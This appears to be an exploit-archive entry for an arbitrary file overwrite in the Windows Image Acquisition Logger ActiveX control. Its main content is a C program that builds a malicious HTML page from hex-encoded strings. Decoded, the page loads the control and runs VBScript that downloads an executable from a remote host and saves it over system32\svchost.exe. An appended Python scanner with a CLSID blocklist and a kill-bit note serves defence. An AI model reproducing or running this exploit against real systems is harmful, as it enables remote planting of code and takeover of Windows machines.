"Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (2)"

Author: Ciph3r

Platform: windows

Release date: 2008-09-08

source: https://www.securityfocus.com/bid/31069/info
 
Microsoft Windows Image Acquisition Logger ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.
 
An attacker can exploit this issue to overwrite files with attacker-supplied data, which will aid in further attacks. 

/*Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite
  Credits for finding the bug go to S4rK3VT TEAM,nice work Ciph3r :) .
  Credits for exploit go to fl0 fl0w
  References- https://www.securityfocus.com/bid/31069/info
*/

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<windows.h>


  char file_1[]=
"\x3C\x6F\x62\x6A\x65\x63\x74\x20\x63\x6C"
"\x61\x73\x73\x69\x64\x3D\x22\x63\x6C\x73"
"\x69\x64\x3A\x41\x31\x45\x37\x35\x33\x35"
"\x37\x2D\x38\x38\x31\x41\x2D\x34\x31\x39"
"\x45\x2D\x38\x33\x45\x32\x2D\x42\x42\x31"
"\x36\x44\x42\x31\x39\x37\x43\x36\x38\x22"
"\x20\x69\x64\x3D\x27\x74\x65\x73\x74\x27"
"\x3E\x3C\x2F\x6F\x62\x6A\x65\x63\x74\x3E"
"\x0D\x0A\x0D\x0A\x3C\x69\x6E\x70\x75\x74"
"\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D"
"\x56\x42\x53\x63\x72\x69\x70\x74\x20\x6F"
"\x6E\x63\x6C\x69\x63\x6B\x3D\x74\x72\x79"
"\x4D\x65\x28\x29\x20\x74\x79\x70\x65\x3D"
"\x62\x75\x74\x74\x6F\x6E\x20\x76\x61\x6C"
"\x75\x65\x3D\x27\x43\x6C\x69\x63\x6B\x20"
"\x68\x65\x72\x65\x20\x74\x6F\x20\x73\x74"
"\x61\x72\x74\x20\x74\x68\x65\x20\x74\x65"
"\x73\x74\x27\x3E\x0D\x0A\x0D\x0A\x3C\x73"
"\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67"
"\x75\x61\x67\x65\x3D\x27";

  char file_2[]=
"\x76\x62\x73\x63\x72\x69\x70\x74\x27\x3E\x0D\x0A\x20\x20\x53"
"\x75\x62\x20\x74\x72\x79\x4D\x65\x0D\x0A\x20\x20\x20\x64\x69"
"\x6D\x20\x72\x65\x6D\x55\x52\x4C\x0D\x0A\x20\x20\x20\x72\x65"
"\x6D\x55\x52\x4C\x20\x3D\x20\x22\x68\x74\x74\x70\x3A\x2F\x2F"
"\x76\x69\x63\x74\x69\x6D\x2E\x63\x6F\x6D\x2F\x73\x76\x63\x68"
"\x6F\x73\x74\x2E\x65\x78\x65\x22\x0D\x0A\x20\x20\x20\x74\x65"
"\x73\x74\x2E\x4F\x70\x65\x6E\x20\x72\x65\x6D\x55\x52\x4C\x2C"
"\x20\x54\x72\x75\x65\x0D\x0A\x20\x20\x20\x74\x65\x73\x74\x2E"
"\x53\x61\x76\x65\x20\x22\x43\x3A\x5C\x57\x49\x4E\x44\x4F\x57"
"\x53\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x73\x76\x63\x68"
"\x6F\x73\x74\x2E\x65\x78\x65\x22\x2C\x20\x54\x72\x75\x65\x0D"
"\x0A\x20";

 char file_3[]=
"\x45\x6E\x64\x20\x53\x75\x62\x0D\x0A\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E";

 void usage(char *);
 int main(int argc,char *argv[])
 {  FILE *m;
    unsigned int offset=0;
    
    if(argc<2)
   { usage(argv[0]);
     return 1;            /* no output file name given */
   }

     if((m=fopen(argv[1],"wb"))==NULL)
   { printf("error");
     exit(0);
   }
    char *buffer;
    /* +1 for the terminating NUL that fprintf("%s") needs */
    buffer=(char *)malloc(strlen(file_1)+strlen(file_2)+strlen(file_3)+1);
    if(buffer==NULL)
   { fclose(m);
     return 1;
   }

    memcpy(buffer,file_1,strlen(file_1)); offset=strlen(file_1);
    memcpy(buffer+offset,file_2,strlen(file_2)); offset+=strlen(file_2);
    memcpy(buffer+offset,file_3,strlen(file_3)+1); /* copies the NUL too */
    fprintf(m,"%s",buffer);
    system("cls");
    printf("|****************************************************||\n");
    printf("Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite\n"); 
    printf("File successfully built\n");
    system("color 02"); 
    Sleep(2000);
    printf("|****************************************************||\n");
    
    free(buffer);
    fclose(m);
return 0;    
      }
      
 void usage(char *f)
 {  printf("|****************************************************||\n");
    printf("Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite\n\n");    
    printf("Usage: exploit.exe file.html\n\n");
    printf("Credits for finding the bug go to S4rK3VT TEAM\n");
    printf("Credits for exploit go to fl0 fl0w\n");
    printf("|****************************************************|\n");
    
    system("color 03");
    Sleep(2000);
       }
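
A detection-side counterpart, added here and not part of the original exploit or advisory: a scanner that flags HTML which instantiates the affected control, for use in a mail or web content filter or when triaging saved pages. The CLSID is the one in the `<object>` tag that `file_1` encodes; the function and class names and the sample pages are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID decoded from the <object> tag stored in file_1 on this page.
BLOCKED_CLSIDS = {"A1E75357-881A-419E-83E2-BB16DB197C68"}

# Accepts "clsid:GUID" with optional braces, any case, stray whitespace.
_CLSID_RE = re.compile(
    r"^\s*clsid:\s*\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?\s*$",
    re.IGNORECASE,
)


class ObjectTagScanner(HTMLParser):
    """Collects (CLSID, element id) for every <object classid=...> tag."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.found = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag/attribute names and decodes entities
        # in attribute values, so case tricks and "&#58;" do not hide a tag.
        if tag != "object":
            return
        attr = {name: (value or "") for name, value in attrs}
        match = _CLSID_RE.match(attr.get("classid", ""))
        if match:
            self.found.append((match.group(1).upper(), attr.get("id", "")))


def find_blocked_controls(html, blocked=BLOCKED_CLSIDS):
    """Return [(clsid, element_id)] for blocklisted controls found in html."""
    scanner = ObjectTagScanner()
    scanner.feed(html)
    scanner.close()
    return [hit for hit in scanner.found if hit[0] in blocked]


# Constructed sample pages (not captured traffic).
SAMPLES = {
    "plain": '<object classid="clsid:A1E75357-881A-419E-83E2-BB16DB197C68" id=\'test\'></object>',
    "obfuscated": '<OBJECT ID=x ClassID="CLSID&#58;{a1e75357-881a-419e-83e2-bb16db197c68}">',
    "benign": '<object classid="clsid:00000000-0000-0000-0000-000000000000" id="ok"></object>',
}

if __name__ == "__main__":
    for name, page in SAMPLES.items():
        print(name, find_blocked_controls(page))
```

A hit on a host that still runs Internet Explorer is a prompt to confirm that the control's kill bit is set (`Compatibility Flags` = 0x400 under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}`).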